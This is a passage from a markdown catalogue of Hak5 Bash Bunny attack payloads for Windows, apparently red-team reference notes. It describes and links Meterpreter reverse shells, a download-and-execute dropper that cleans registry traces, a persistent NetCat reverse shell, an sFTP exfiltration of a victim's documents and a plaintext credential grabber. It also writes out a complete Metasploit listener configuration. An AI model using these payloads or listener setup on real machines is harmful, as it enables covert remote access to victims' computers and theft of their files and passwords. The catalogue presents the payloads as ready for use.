                        BB-Meterpreter_winx64.js
                        inv.vbs
    STAGE2():
        Executes hidden cmdshell via inv.vbs, launching payload
    STAGE3():
        Shutdown 0


### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Listener:
        use exploit/multi/handler
        set PAYLOAD windows/(x64/|)meterpreter/reverse_tcp
        set PAYLOAD windows/meterpreter/reverse_tcp
        set LHOST 0.0.0.0
        set LPORT 443
        set EnableUnicodeEncoding true
        set EnableStageEncoding true
        set ExitOnSession false
        exploit -j
* BashBunny:
        Edit JSRevMeter replacing the following:
            RHOST => Remote Listening Host
            RPORT => Remote Listening Port
            FILE1 => Payload file1 URL, ex: http://t.co/43rg67
            FILE2 => Payload file1 URL, ex: http://t.co/8ry8h0
        Upload monilithic script to your BB

## Meterpreter staged payload

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/WindowsMeterpreterStaged" %}

> This is an a advanced meterpreter staged payload injection using the rubber ducky capabilites of the bash bunny to call a powershell script referred to sc.txt which must be hosted on a remote server. This script then downloads the update.exe which is also hosted on a remote host, and then executes it on the target machine. Note it will also attempt to clean up any registry footprint from the run command. Once the bash bunny is initialized the script should not take more than 2-3 sec to execute.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* you must have sc.txt and update.exe hosted on a remote server. replace the 127.0.0.1 with your own host and also feel free to change the name of either sc.txt or update.exe to names of your choosing. You must also generate the appropariate update.exe payload using msfvenom for windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)

## Persistent Reverse Shell

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/WindowsPersistentReverseShell" %}

> Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## ExecutableInstaller with sftp recursive directory grab

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/sFTP%20Directory%20Grabber" %}

> Copies psFTP.exe from the Bash Bunny USB Mass Storage root directory to %TEMP% and then executes with parameters in the e.cmd.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] MacOS
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* By default the staged payload copies the payload psFTP.exe from the root of the Bash Bunnyand executes it via e.cmd. The payload copies to %TEMP%, change this to wherever you like by editing e.cmd. You may also copy a payload inside a directory, see comments in e.cmd. Make changes to e.cmd for your sFTP user@domain.com, sFTP password, sftp directory for loot and target machine directory for loot to be taken from. Variables are as follows:
* sftphost=username@hostname.domain.com sftppass=password lootfrom=c:\users\username\documents looto=/loot

#### IMPORTANT:

* To Download psftp.exe please use one of the links below:
* 32-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe
* 64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe
* Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload.

## Pinapple Core

> The BashBunny can be used together with the WiFiPinapple to create the Pinapple core

{% embed url="https://forums.hak5.org/topic/40947-bashbunny-connected-to-pineapple/" %}

## Credential grabber

> Grabs plaintext passwords from unlocked pcs

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber" %}
